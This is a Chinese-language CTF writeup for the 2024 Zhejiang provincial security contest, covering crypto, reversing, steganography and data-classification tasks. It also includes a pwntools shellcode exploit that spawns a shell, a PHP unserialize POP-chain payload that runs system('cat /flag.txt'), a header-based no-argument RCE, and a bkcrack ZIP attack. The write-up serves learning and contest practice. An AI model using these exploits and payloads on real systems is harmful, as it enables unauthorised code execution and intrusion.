2024年第七届浙江网安省赛writeup

省赛预赛#

photo-1

签到-签到题#

1
6L<Ak3,*@VM*>7U&FZFNWc,Ib=t,X!+,BnSDfoaNhdiO*][5F];eV^]Lm&?$'<oeGH&6tqcgK_JDp-3;8wh?Si,G$BarTFjE?b$eR/,Igij<({u90M$5If589[<4+jp%3_%R(526#1J|m5p&H+%.#d0<DmLK*#-\8w:xD2Y[3jO{l8[)<(F[=Bcixb>Jp^%L2XvVTzW@9OTko/P74d1sFscEbMO7Vhp&HM;+ww/v[KM1%2M*7O\}rEZM.LM0'\iwK:])pg-nJef\Rt4
2

3
-> base92
4

5
:2WsR9eo=EA2%h#>&.;[@sVfC=]\cp;cldd<btVh:IeqR=))D<;Fjh`:3pGh9kmF$A6)#b;0kYf=Y`Tp>":;\9e\O]=)(2\@mt3%@o[b2@PDj\@5:GL;clXGA8QF0<\[$#A27XM<c)A_A4JJ#ASspo;(ssa;/7md;/T-H;b0o59iZ9n;H@RX;cmj;<`O*6=`$/Q=%>8qA27=\@96u]@7FCG=`.,)
6

7
--> base85
8

9
NnRwM2JZd0lVZkZoczh1YWZDSXNIVlQ3OGd6WjhFRHVNNzdoMjNRdVBDQzE4Y2JyZG1hM081WjF3cElDcUx5b0s5a2JMSXJ0dmtsV1E5d2c2VmdkdG4wenE5Q081Qk1UQnNnSHUxMUt6RVkxSXlWVUpNYm90WG9xd2ZJaWdtaFYzYnRC
10

11
-> base64
12

13
6tp3bYwIUfFhs8uafCIsHVT78gzZ8EDuM77h23QuPCC18cbrdma3O5Z1wpICqLyoK9kbLIrtvklWQ9wg6Vgdtn0zq9CO5BMTBsgHu11KzEY1IyVUJMbotXoqwfIigmhV3btB
14

15
-> base62
16

17
nbgCtvcRjay6YrYmWqGk6JgBhUgGWx3Dii4T1jYoihmpb79zcuiqMvFCdLxvkNDn4768DTbxsegoHAxNf5czNPPAfgMoe6LRui
18

19
-> base58
20

21
5C9VB8W09FG6DC9LX6J1A3T9ZY9P7BKG6+M9B1AO7BI%6OTAZY91G60Z9%IBG09NIBNB9TB9
22

23
-> base45
24

25
IRAVGQ2UIZ5XOZLMMNXW2ZK7ORXV66TKMN2GMXZSGAZDI7I=
26

27
-> base32
28

29
DASCTF{welcome_to_zjctf_2024}

base编码套娃题。

签到-网安知识大挑战#

signin-2

signin-3

signin-1

从源码中获取答案即可。

web-easyjs#

1
const express = require('express');
2
const _ = require('lodash');
3
const fs = require('fs');
4
const app = express();
5

6
app.use(express.json());
7

8
// 存储笔记的对象
9
const notes = {};
10

11
// 创建新笔记
12
app.post('/api/notes', (req, res) => {
13
    const noteId = req.body.id;
14
    const noteData = req.body;
15

16
    if (!noteId) {
17
        return res.status(400).json({ error: 'Missing id' });
18
    }
19

20
    // 使用lodash.merge，该版本存在原型链污染漏洞
21
    notes[noteId] = {};
22
    _.merge(notes[noteId], noteData);
23
    console.log('Note prototype:', Object.getPrototypeOf(notes[noteId]));
24
    console.log('Note properties:', notes[noteId]);
25
    res.json(notes[noteId]);
26
});
27

28
// 获取笔记
29
app.get('/api/notes/:id', (req, res) => {
30
    const noteId = req.params.id;
31

32
    if (!notes[noteId]) {
33
        return res.status(404).json({ error: 'Note not found' });
34
    }
35

36
    res.json(notes[noteId]);
37
});
38

39
// 获取flag (仅管理员可访问)
40
app.get('/api/flag', (req, res) => {
41
    const noteId = req.headers['note-id'];
42

43
    if (!noteId || !notes[noteId]) {
44
        return res.status(403).json({ error: 'Authentication required' });
45
    }
46

47
    if (!notes[noteId].isAdmin) {
48
        return res.status(403).json({ error: 'Admin access required' });
49
    }
50

51
    try {
52
        const flag = fs.readFileSync('/flag', 'utf8');
53
        res.json({ flag: flag.trim() });
54
    } catch (err) {
55
        res.status(500).json({ error: 'Error reading flag' });
56
    }
57
});
58

59
app.listen(8000, () => {
60
    console.log('Server running on port 8000');
61
});

虽然他说了原型链污染，但是好像不需要用到，直接传一个isAdmin: true就可以了。

POST:

1
{"id":100, "isAdmin":true}

GET:

1
node-id: 100

结果：

easyjs

reverse-ezRe#

拿到一个二进制文件，先file一下：

1
$ file ezRe
2
ezRe: Byte-compiled Python module for CPython 3.9, timestamp-based, .py timestamp: Mon Oct 21 03:17:07 2024 UTC, .py size: 722 bytes

是pyc字节码，先mv ezRe ezRe.pyc一下。

pycdc反编译，同时对照pycdas修正一些反编译错误的地方：

1
import base64
2
text = input('Flag: ')
3
key = '7e021a7dd49e4bd0837e22129682551b'
4
key = [ ord(i) ^ 102 for i in key ]
5
s = list(range(256))
6
j = 0
7
for i in range(256):
8
    j = (j + s[i] + key[i % len(key)]) % 256
9
    s[i], s[j] = s[j], s[i]
10
i = j = 0
11
data = []
12
for _ in range(50):
13
    i = (i + 1) % 256
14
    j = (j + s[i]) % 256
15
    s[i], s[j] = s[j], s[i]
16
    data.append(s[(s[i] + s[j]) % 256])
17

18
result = ''
19
for c, k in zip(text, data):
20
    result += chr(ord(c) ^ k ^ 51)
21
enc = base64.b64encode(result.encode()).decode()
22
if enc == 'w53Cj3HDgzTCsSM5wrg6FMKcw58Qw7RZSFLCljRxwrxbwrVdw4AEwqMjw7/DkMKTw4/Cv8Onw4NGw7jDmSdcwq4GGg==':
23
    print('yes!')
24
else:
25
    print('try again...')

是魔改RC4，直接解密：

1
import base64
2

3
data = [170, 253, 17, 179, 83, 196, 107, 105, 233, 56, 16, 150, 143, 64, 241, 71, 24, 84, 151, 101, 111, 187, 11, 183, 89, 222, 14, 245, 118, 254, 206, 193, 159, 190, 228, 147, 19, 243, 143, 114, 11, 254, 6, 84, 179, 4, 120, 202, 116, 18]
4
b64_dec = base64.b64decode('w53Cj3HDgzTCsSM5wrg6FMKcw58Qw7RZSFLCljRxwrxbwrVdw4AEwqMjw7/DkMKTw4/Cv8Onw4NGw7jDmSdcwq4GGg==').decode()
5
flag = ''.join([chr(ord(x) ^ y ^ 51) for x, y in zip(b64_dec, data)])
6
print(flag)

misc-RealSignin#

RealSignin

图片隐写，常规流程：

binwalk: 未发现隐藏文件
Stegsolve: 发现LSB隐写ABCDEFGHIJKLMNabcdefghijklmnopqrstuvwxyzOPQRSTUVWXYZ0123456789+/
010 Editor: 发现图片末尾编码字符串dEFfc1dGq1pxMgMWnihrMx9mewNgdvIWMvctrc

换表base64：

RealSignin-4

misc-机密文档#

misc-zip-1

发现压缩包有密码，压缩包里面有一个名字很长的文件。显然是明文攻击，使用bkcrack：

1
$ echo -n the_secret_you_never_ever_know_hahahaha > plain.txt
2
bkcrack -C 机密文档.zip -c the_secret_you_never_ever_know_hahahaha.zip -p plain.txt -o 30
3
bkcrack 1.7.0 - 2024-05-26
4
[16:05:40] Z reduction using 31 bytes of known plaintext
5
100.0 % (31 / 31)
6
[16:05:41] Attack on 252307 Z values at index 37
7
Keys: b8edf1ff c1f93a7e f93d08e0
8
81.3 % (205174 / 252307)
9
Found a solution. Stopping.
10
You may resume the attack with the option: --continue-attack 205174
11
[16:07:26] Keys
12
b8edf1ff c1f93a7e f93d08e0
13
$ unzip out.zip
14
Archive:  out.zip
15
 extracting: the_secret_you_never_ever_know_hahahaha.zip
16
$ unzip the_secret_you_never_ever_know_hahahaha.zip
17
Archive:  the_secret_you_never_ever_know_hahahaha.zip
18
  inflating: the_secret_you_never_ever_know_hahahaha.docm
19
$ file the_secret_you_never_ever_know_hahahaha.docm
20
the_secret_you_never_ever_know_hahahaha.docm: Microsoft Word 2007+

获得一个the_secret_you_never_ever_know_hahahaha.docm，可以用word打开，里面有一张图片还有一段宏代码：

misc-zip-2

1
Sub key()
2
    Dim decValues As Variant
3
    Dim str As String
4
    Dim result As String
5
    Dim i As Integer
6
    Dim xorValue As Integer
7

8
    decValues = Array(26, 25, 28, 0, 16, 1, 74, 75, 45, 29, 19, 49, 61, 60, 3)
9
    str = "outguess"
10
    result = ""
11

12
    For i = LBound(decValues) To UBound(decValues)
13
        xorValue = decValues(i) Xor Asc(Mid(str, (i Mod Len(str)) + 1, 1))
14
        result = result & Chr(xorValue)
15
    Next i
16

17
End Sub

根据宏中的提示，使用了outguess隐写，密钥可以通过执行宏获取ulhged98BhgVHYp

1
$ unzip the_secret_you_never_ever_know_hahahaha.docm -d docm
2
$ ls doc/word/media/
3
image1.jpeg
4
$ mv doc/word/media/image1.jpeg image1.jpg
5
$ outguess -r image1.jpg -k ulhged98BhgVHYp -t flag.txt
6
Reading image1.jpg....
7
Extracting usable bits:   44417 bits
8
Steg retrieve: seed: 156, len: 26
9
$ cat flag.txt
10
DASCTF{B1g_S3CR3t_F0R_Y0u}

pwn-shellcode#

shellcode-2

保护全开。

shellcode

程序在随机地址开一个mmap，大小4KB。

然后读入10字节到haystack里面，用memmem搜索有没有0x0F05，也就是syscall，如果有，不让执行。

所以这题要在禁用syscall的情况下，来getshell，并且只能利用10字节的空间。空间太小，肯定不能直接使用shellcode，因此这题肯定是要绕过10字节限制，把shellcode写到mmap里。

唯一能控制mmap的地方是read函数，因此需要在10字节的空间里面，实现对read参数的控制。

shellcode-3

只需控制rdx，然后跳转到mov edx, 0Ah，之后，即可无限制写入shellcode。

payload：

1
pop rdx      ; 1B
2
sub edx, 68  ; 4B
3
push rdx     ; 1B
4
mov rdx, r11 ; 3B, 此处r11 = 0x246
5
ret          ; 1B

exp:

1
from pwn import *
2
context.log_level = 'DEBUG'
3

4
context(os="linux", arch="x86-64")
5

6
p = process("./shellcode")
7
# p = gdb.debug("./shellcode")
8

9
shellcode='''
10
pop rdx
11
sub rdx, 68
12
push rdx
13
mov rdx, r11
14
ret
15
'''
16
print(asm(shellcode))
17
payload = asm(shellcode).ljust(10, b'\x90')
18
p.send(payload)
19
p.send(asm(shellcraft.sh()))
20
p.interactive()

crypto-myez_encode#

1
from Crypto.Util.number import bytes_to_long, getPrime
2
from sympy import isprime
3
import random
4
from flag import flag
5
def generate_ecc_parameters():
6
    x = random.randint(1, 1 << 512)
7
    y = random.randint(1, 1 << 512)
8
    return x, y
9

10
def find_prime_on_curve(x, y, a, b, ecc_p):
11
    p = x
12
    q = y
13
    while not (isprime(p) and isprime(q)):
14
        p = random.randint(2, ecc_p - 1)
15
        q = (p**3 + a * p + b) % ecc_p
16
    return p, q
17

18
def generate_rsa_parameters():
19
    a = getPrime(512)
20
    b = getPrime(512)
21
    ecc_p = getPrime(512)
22
    x, y = generate_ecc_parameters()
23
    p, q = find_prime_on_curve(x, y, a, b, ecc_p)
24
    n = p * q
25
    print(f"p= {p}\nq= {q}\nn= {n}")
26
    print(f"a= {a}\nb= {b}")
27
    print(f"P= {ecc_p}")
28

29
if __name__ == "__main__":
30
    generate_rsa_parameters()
31

32
n = p*q
33
e = 9
34
m = bytes_to_long(flag)
35
c = pow(m,e,n)
36
print(c)
37

38
'''
39
n= 23298836191712395990541254600776262066247692725919114528027158820049802443474994576179738462067629079873633948850637889127452791527914591229415148712172587856497614285410824614070907847594399218298016379507879066220104597707859246179921731928508884947347652904142879813069359815823184922170241099916465722623
40
a= 7388665644223916915334064243181348811184637180763467245762518813757790945069068654378380490110607063038613823004593920489924786053478102905200169738195523
41
b= 11742940161647091720180482697980016011774828087234021441133595442949631197989696508358388255191793888646498553804646435609849154496274569000398776043150743
42
P= 11300086101709077144191286182913849072593185125745291892398153828719453495325025227858328617077648296782357912556752467026523366682963139253552060862229027
43
c= 9314530945343661153059846131608414257092556390479105017633636336832925597262814680689800448223193301814365726128618348603188219757245073917910487794768758461683644600756896595336654006282030911824869219015400826589122838492456940861634378619000373353637666835642505021355710338342048772713981673863167110471
44
'''

\begin{align*} n &= p \times q \\ q &\equiv (p^3 + a p + b) \pmod{ecc_p} \\ n &\equiv (p^4 + a p^2 + b p) \pmod{ecc_p} \\ \end{align*}

通过解方程分解出 $n = p q$ ，然后发现 $e$ 和 $\varphi(n)$ 不互质，不能直接求 $d$ ，但是 $e$ 较小，可以直接开根：

1
from sage.all import *
2
from Crypto.Util.number import long_to_bytes
3

4
n= 23298836191712395990541254600776262066247692725919114528027158820049802443474994576179738462067629079873633948850637889127452791527914591229415148712172587856497614285410824614070907847594399218298016379507879066220104597707859246179921731928508884947347652904142879813069359815823184922170241099916465722623
5
a= 7388665644223916915334064243181348811184637180763467245762518813757790945069068654378380490110607063038613823004593920489924786053478102905200169738195523
6
b= 11742940161647091720180482697980016011774828087234021441133595442949631197989696508358388255191793888646498553804646435609849154496274569000398776043150743
7
P= 11300086101709077144191286182913849072593185125745291892398153828719453495325025227858328617077648296782357912556752467026523366682963139253552060862229027
8
c= 9314530945343661153059846131608414257092556390479105017633636336832925597262814680689800448223193301814365726128618348603188219757245073917910487794768758461683644600756896595336654006282030911824869219015400826589122838492456940861634378619000373353637666835642505021355710338342048772713981673863167110471
9
n, a, b, P, c = Integer(n), Integer(a), Integer(b), Integer(P), Integer(c)
10

11
R = Zmod(P)['x']
12
x = R.gen()
13
# p**4 + a * p**2 + b * p = n
14
f = x**4 + a * x**2 + b * x - n
15
# f.roots()
16
# [(2925490712948356009205547798331037409204468852265154197929696123102317330847028997592576845375767951888373634075473448002921250636926630905567362014595493, 1)]
17
p = 2925490712948356009205547798331037409204468852265154197929696123102317330847028997592576845375767951888373634075473448002921250636926630905567362014595493
18
assert n % p == 0
19
q = n // p
20

21
e = Integer(9)
22
# gcd(e, p-1) = 3
23
# gcd(e, q-1) = 1
24
for m_p in Mod(c, p).nth_root(e, all=True):
25
    m_q = Mod(c, q) ** inverse_mod(e, q-1)
26
    print(long_to_bytes(crt([Integer(m_p), Integer(m_q)], [p, q])))

运行即可输出flag。

信创安全-ds-data#

ds-data

拖到mysql的数据文件夹里面就可以打开题目给的文件了。

1
mysql> SHOW DATABASES;
2
+--------------------+
3
| Database           |
4
+--------------------+
5
| information_schema |
6
| mysql              |
7
| performance_schema |
8
| person             |
9
| sys                |
10
+--------------------+
11
5 rows in set (0.02 sec)
12

13
mysql> USE person;
14
Database changed
15
mysql> SHOW TABLES;
16
+------------------+
17
| Tables_in_person |
18
+------------------+
19
| data             |
20
+------------------+
21
1 row in set (0.01 sec)
22

23
mysql> DESCRIBE data;
24
+------------+--------------+------+-----+---------+-------+
25
| Field      | Type         | Null | Key | Default | Extra |
26
+------------+--------------+------+-----+---------+-------+
27
| userid     | int(255)     | NO   | PRI | NULL    |       |
28
| username   | varchar(255) | YES  |     | NULL    |       |
29
| password   | varchar(255) | YES  |     | NULL    |       |
30
| name       | varchar(255) | YES  |     | NULL    |       |
31
| idcard     | varchar(255) | YES  |     | NULL    |       |
32
| phone      | varchar(255) | YES  |     | NULL    |       |
33
| cryptoType | varchar(255) | YES  |     | NULL    |       |
34
+------------+--------------+------+-----+---------+-------+
35
7 rows in set (0.01 sec)

注意数据库是根据cryptoType字段来加密的，一共三种加密方式：base32、base64、base85。先导出所有数据解密后再进行查询。然后根据要求进行数据处理即可。

省赛决赛#

未完成，待更新。

photo-2

签到-FINAL-CHECKIN#

1
密文: 570fc2416dad7569c13356820ba67ba628c6a5fcbc73f1c8689612d23c3a779befeacf678f93ff5eb4b58dc09dcb9a89
2
Key：??????????000000 <= ?是每个题目的答案大写
3
IV: 12345678
4

5
flag格式为 DASTCF{xxxxx}，提交时只需要提交括号中间的内容。

10道选择题， $4^{10} = 1048576$ ，爆破完全可以接受。一开始以为是AES加密，后面根据提示，是Triple DES：

1
from Crypto.Cipher import DES3
2
import itertools
3

4
choose = ['A', 'B', 'C', 'D']
5

6
c = bytes.fromhex('570fc2416dad7569c13356820ba67ba628c6a5fcbc73f1c8689612d23c3a779befeacf678f93ff5eb4b58dc09dcb9a89')
7
iv = b'12345678'
8

9
def sol(key):
10
    ci = DES3.new(key, DES3.MODE_CBC, iv)
11
    m = ci.decrypt(c)
12
    if b'DAS' in m:
13
        print(m)
14

15
for i in itertools.product(choose, repeat=10):
16
    key = (''.join(i) + '000000').encode()
17
    sol(key)

大约十几秒就可以跑出来。

1
$ python sol.py
2
b'DASCTF{Cyber_Security_2024_N1SC_Fina1_JiaY0u}\x03\x03\x03'

web-wucanrce#

1
<?php
2
echo "get只接受code欧,flag在上一级目录<br>";
3
$filename = __FILE__;
4
highlight_file($filename);
5
if(isset($_GET['code'])){
6
    if (!preg_match('/session_id\(|readfile\(/i', $_GET['code']))
7
     {
8
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['code'])) {
9
                @eval($_GET['code']);
10
                print_r(eval("getallheaders();"));
11
                print_r(getallheaders());
12
            }
13

14
    }
15
    else{
16
        die("不让用session欧，readfile也不行");
17
    }
18
}
19
?>

不让使用session_id和readfile，并且使用正则表达式/[a-z,_]+$(?R)?$/来禁止传入参数，也就是说可以传入phpinfo();这样的函数，但是不能传入system('ls');这样带参的。

正则表达式中的(?R)的意思是递归匹配，也就是说可以传入a(b(c))这样的函数。

题目名wucanrce的意思就是无参RCE，不能访问session和文件的情况下，RCE传参还有一个地方可以利用，就是getallheaders()函数，这个函数可以获取到HTTP请求头，我们可以把代码注入到请求头里。

wucanrce

传入HTTP头a:??????即可实现RCE。

web-unserialize#

1
<?php
2
highlight_file(__FILE__);
3
error_reporting(0);
4
class AAA{
5
    public $aear;
6
    public $string;
7
    public function __construct($a){
8
        $this -> aear = $a;
9
    }
10
    function __destruct()
11
    {
12
        echo $this -> aear;
13
    }
14
    public function __toString()
15
    {
16
        $new = $this -> string;
17
        return $new();
18
    }
19

20
}
21

22
class BBB {
23
    private $pop;
24

25
    public function __construct($string) {
26
        $this -> pop = $string;
27
    }
28

29
    public function __get($value) {
30
        $var = $this -> $value;
31
        $var[$value]();
32
    }
33
}
34

35
class DDD{
36
    public $bag;
37
    public $magazine;
38

39
    public function __toString()
40
    {
41
        $length = @$this -> bag -> add();
42
        return $length;
43
    }
44
    public function __set($arg1,$arg2)
45
    {
46
        if($this -> magazine -> tower)
47
        {
48
            echo "really??";
49
        }
50
    }
51
}
52

53
class EEE{
54
    public $d=array();
55
    public $e;
56
    public $f;
57
    public function __get($arg1){
58
        $this->d[$this->e]=1;
59
        if ($this->d[]=1){
60
            echo 'nononononnnn!!!';
61
            }
62
        else{
63
            eval($this->f);
64
            }
65
    }
66
}
67

68
class FFF{
69
    protected $cookie;
70

71
    protected function delete() {
72
        return $this -> cookie;
73
    }
74

75
    public function __call($func, $args) {
76
        echo 'hahahhhh';
77
        call_user_func([$this, $func."haha"], $args);
78
    }
79
}
80

81
class GGG{
82
    public $green;
83
    public $book;
84
    public function __invoke(){
85
        if(md5(md5($this -> book)) == 666) {
86
            return $this -> green -> pen;
87
        }
88
    }
89
}
90

91

92

93
if(isset($_POST['UP'])) {
94
    unserialize($_POST['UP']);
95
}

调用链：

1
AAA->__destruct()
2
AAA->__toString()
3
GGG->__invoke()
4
EEE->__get('pen')
5
eval($this->f)

以下是每个部分如何绕过：

MD5碰撞#

1
public function __invoke(){
2
    if(md5(md5($this -> book)) == 666) {
3
        return $this -> green -> pen;
4
    }
5
}

利用PHP字符串与整数的弱类型比较，写python脚本进行MD5碰撞。

1
import hashlib
2
import string
3
import itertools
4

5
def double_md5(s):
6
    first_hash = hashlib.md5(s.encode()).hexdigest()
7
    second_hash = hashlib.md5(first_hash.encode()).hexdigest()
8
    return second_hash
9

10
def random_str():
11
    n = 1
12
    while True:
13
        for s in itertools.product(string.digits + string.ascii_letters, repeat=n):
14
            yield ''.join(s)
15
        n += 1
16

17
for s in random_str():
18
    m = double_md5(s)
19
    if m.startswith('666') and not m[3].isdigit():
20
        print(s)
21
        print(m)
22
        break

运行得到md5(md5('eS')) = '666adf7e8db0edc039faffa03fdcccd7'。所以$this -> book = 'eS';。

__get()#

1
    public function __get($arg1){
2
        $this->d[$this->e]=1;
3
        if ($this->d[]=1){
4
            echo 'nononononnnn!!!';
5
            }
6
        else{
7
            eval($this->f);
8
            }
9
    }

为了让此处走else分支，需要控制$this->d，经过尝试，当$this->d设置为一个字符串的时候，会报error，不行。设置为一个整数的时候，只会报warning，并且分支也会走else。

所以让$this->d = 1即可。

生成payload#

1
$e = new EEE();
2
$e -> d = 1;
3
$e -> f = "system('cat /flag.txt');";
4

5
$g = new GGG();
6
$g -> book = 'eS';
7
$g -> green = $e;
8

9
$a = new AAA(new AAA(1));
10
$a -> aear -> string = $g;
11

12
echo serialize($a);

payload#

1
UP=O:3:"AAA":2:{s:4:"aear";O:3:"AAA":2:{s:4:"aear";i:1;s:6:"string";O:3:"GGG":2:{s:5:"green";O:3:"EEE":3:{s:1:"d";i:1;s:1:"e";N;s:1:"f";s:24:"system('cat /flag.txt');";}s:4:"book";s:2:"eS";}}s:6:"string";N;}

unserialize

misc-FinalSign#

FinalSign

snow隐写。

1
$ snow -C FinalSign.txt
2
xorkey:helloworld

循环异或。

1
flag = bytes.fromhex("2c243f2f3b3114345d0a0909333f06100143023b2c55020912")
2
key = b'helloworld'
3
print(bytes([flag[i] ^ key[i % len(key)] for i in range(len(flag))]))
4
# b'DASCTF{F1nal_Sign1n_D0ne}'

misc-非黑即白#

拿到未知二进制文件，常规流程：

file:
Terminal window
```
1
$ file 非黑即白
2
非黑即白: data
```
binwalk: 什么都没有
010 Editor打开，开头什么都没有，结尾有字符串FIG。估计是GIF文件倒过来。

写python脚本倒回去：

1
with open("非黑即白", 'rb') as f:
2
    data = f.read()
3

4
with open("out.gif", 'wb') as f:
5
    f.write(data[::-1])

确实是一张gif图。

1
$ file out.gif
2
out.gif: GIF image data, version 89a, 100 x 100

打开图片发现黑白不停闪烁，使用python获取总帧数为1536，猜测通过黑白编码了01比特流。

1
print(img.n_frames) # 1536

提取每一帧，保存为二进制文件：

1
with open("out", 'wb') as f:
2
    img = Image.open("out.gif")
3

4
s = '0'
5

6
for i in range(1, img.n_frames):
7
    img.seek(i)
8
    if img.getpixel((0, 0))[0] < 128:
9
        s += '0'
10
    else:
11
        s += '1'
12

13
s = bytes([int(s[i:i+8], base=2) for i in range(0, img.n_frames, 8)])
14

15
with open("out.zip", "wb") as f:
16
    f.write(s)

比特流恢复出来是一个zip压缩包。

1
$ file out.zip
2
out.zip: Zip archive data, at least v2.0 to extract, compression method=store

但是这个压缩包有密码。尝试了伪加密，暴力字典，和明文攻击（长度不够8 bytes），都无果，如果有知道怎么破解的师傅欢迎联系。

crypto-DlcgH_r#

1
from Crypto.Util.number import *
2
from gmpy2 import *
3

4
flag = b'DASCTF{******}'
5
def iterate_function(seed, coeff_a, coeff_b, prime_modulus):
6
    return (coeff_a * seed + coeff_b) % prime_modulus
7

8
def iterate_multiple_times(seed, num_iterations, coeff_a, coeff_b, prime_modulus):
9
    for _ in range(num_iterations):
10
        seed = iterate_function(seed, coeff_a, coeff_b, prime_modulus)
11
    return seed
12

13
p = getPrime(600)
14
a = getPrime(512)
15
b = getPrime(512)
16
s = getPrime(512)
17
k = getPrime(512)
18
t = getPrime(512)
19

20
A = iterate_multiple_times(s, k, a, b, p)
21
B = iterate_multiple_times(s, t, a, b, p)
22

23
print("p =", p)
24
print("a =", a)
25
print("b =", b)
26
print("s =", s)
27
print("A =", A)
28
print("B =", B)
29

30
secret1 = iterate_multiple_times(A, k, a, b, p)
31
secret2 = iterate_multiple_times(B, t, a, b, p)
32

33
assert secret1 == secret2
34
'''
35
p = 2565258348684709722726260231955260453241716968378483821594041597297293609376806025180965681289016169408781752953380586044352169083397987333072306444539318806255242559916564022662479
36
a = 7703427441632069990122897903141278700284019287330080801753208940444135129072547305259960648105321270085533531118395452229965873504176368162947864923497711
37
b = 8477265953761650860710068507342719089504862957398782381045770264963932696457722724393775545810962476516315838411812248360284564925846788951219272632661157
38
s = 9228773209718156231041982890745928246648483643042884535935071957475932603607283209094294685862893340598940862096657878372229519375655468524041406914666867
39
A = 434251860827782638796736001849473241231781620594954088572922898040098881748337513244415553659525671751903798527967205418513869125476445927127124010452649344318178999731385274553080
40
B = 434251860827782638796736001849473241231781620594954088572922898040098881748337513244415553659525671751903798527967205418513869125476445927127124010452649344318178999731385274553080
41
'''
42

43
p2 = next_prime(secret1)
44
q2 = getPrime(600)
45
n2 = p2*q2
46
e = 4
47
m = bytes_to_long(flag)
48
c = pow(m, e, n2)
49
print("n2 =", n2)
50
print("c =", c)
51

52
'''
53
n2 = 3241139665583501598296135149075754735041636843305130049654913708275571916563715101898946962033698805416493133339619007016676895968314902474922279948997540924678346952667095320094789476561995339618782687993966133770687551933070478999383821269223854568552819152909266096733330218505088222661907600152055916956562332379930822529724151378274932991887183193175206749
54
c = 1131281812215293796960536920068009435705926803182047772347743960804329656316689664084120353862091370978145286943689311985878028828902275260824388998300548644880722651153603738691769179255824425771260974588160589473958033612303767050773921373389315920529311000160530833707622310013322631917184737227893101365726934901652170763292132835433158093074003616578836411
55
'''

使用线性同余随机数生成器生成两个随机数进行密钥交换，但是注意到A=B，可以推出k=t，爆破k：

1
k = 1
2
seed = A
3
while True:
4
    seed = iterate_function(seed, a, b, p)
5
    print(k)
6
    p = next_prime(seed)
7
    if n2 % p == 0:
8
        print(k)
9
        print(p)
10
        break
11
    k += 1

得k=12345，可对n进行分解，注意到本题 $gcd(e, \varphi(n)) \neq 1$ ，但是 $e$ 较小，和预赛那题一样，直接开根：

1
k = 12345
2
p = 1472490340321845700492870656866629756386520746748019952980831685935628618084832981576756885932019702470337632472478610542460495595381421112792242654382213433012352298291319463142659
3
assert n2 % p == 0
4
q = n2 // p
5

6
x1_s = Mod(Integer(c), Integer(p)).nth_root(4, all=True)
7
x2_s = Mod(Integer(c), Integer(q)).nth_root(4, all=True)
8

9
for x1, x2 in itertools.product(x1_s, x2_s):
10
    flag = long_to_bytes(crt([Integer(x1), Integer(x2)], [p, q]))
11
    print(flag)

DlcgH_r

信创安全-datasecurity_classify1#

根据文档描述对字段进行分类即可：

1
with open("data.csv", "r") as f:
2
    data = f.readlines()
3

4
coe = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
5
tbl = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
6
ph = [734, 735, 736, 737, 738, 739, 747, 748, 750, 751, 752, 757, 758, 759, 772,
7
778, 782, 783, 784, 787, 788, 795, 798, 730, 731, 732, 740, 745, 746, 755,
8
756, 766, 767, 771, 775, 776, 785, 786, 796, 733, 749, 753, 773, 774, 777,
9
780, 781, 789, 790, 791, 793, 799]
10

11
print('类型,数据值')
12

13
for line in data:
14
    line = line.strip()
15
    if len(line) == 18 and all([c in '0123456789X' for c in line]):
16
        s = sum([coe[i] * int(line[i]) for i in range(17)])
17
        s %= 11
18
        if tbl[s] == line[17]:
19
            print('身份证号', line, sep=',')
20
            continue
21
    if len(line) == 11 and all([c in '0123456789' for c in line]):
22
        if int(line[:3]) in ph:
23
            print('手机号', line, sep=',')
24
            continue
25
    if all([ord(c) > 127 for c in line]):
26
        print('姓名', line, sep=',')
27
        continue
28
    print(line)

信创安全-datasecurity_classify2#

给了一个流量包，用wireshark提取出文本之后，用正则表达式匹配并检验敏感数据：

1
import os
2
import re
3

4
id = []
5
ph = []
6
ip = []
7

8
def get(data):
9
    global id, ph, ip
10
    id += [ ''.join(x) for x in re.findall(r'[^\d](\d{6})[\-\s]?(\d{8})[\-\s]?(\d{3})(\d|X)[^\d]', data)]
11
    ph += [ ''.join(x) for x in re.findall(r'[^\d](\d{3})[\-\s]?(\d{4})[\-\s]?(\d{4})[^\d]', data)]
12
    ip += re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', data)
13

14
for root, dirs, files in os.walk('./wireshark_extract'):
15
    for file in files:
16
        with open(os.path.join(root, file), 'r') as f:
17
            get(f.read())
18

19
coe = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
20
tbl = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
21

22
def vali_id(idcard):
23
    s = sum([coe[i] * int(idcard[i]) for i in range(17)])
24
    s %= 11
25
    if tbl[s] != idcard[17]:
26
        # print(idcard)
27
        return False
28
    return True
29

30
def vali_phone(s):
31
    if int(s[:3]) not in [734, 735, 736, 737, 738, 739, 747, 748, 750, 751, 752, 757, 758, 759, 772, 778,
32
        782, 783, 784, 787, 788, 795, 798, 730, 731, 732, 740, 745, 746, 755, 756, 766,
33
        767, 771, 775, 776, 785, 786, 796, 733, 749, 753, 773, 774, 777, 780, 781, 789,
34
        790, 791, 793, 799]:
35
        # print(s)
36
        return False
37
    return True
38

39
def vali_ip(i):
40
    splited = [int(x) for x in i.split('.')]
41
    if all([x < 256 for x in splited]):
42
        return True
43
    # print(i)
44
    return False
45

46
id = [i for i in id if vali_id(i)]
47
ph = [p for p in ph if vali_phone(p)]
48
ip = [i for i in ip if vali_ip(i)]
49

50
print('category,value')
51
for i in id:
52
    print('idcard', i, sep=',')
53
for p in ph:
54
    print('phone', p, sep=',')
55
for i in ip:
56
    print('ip', i, sep=',')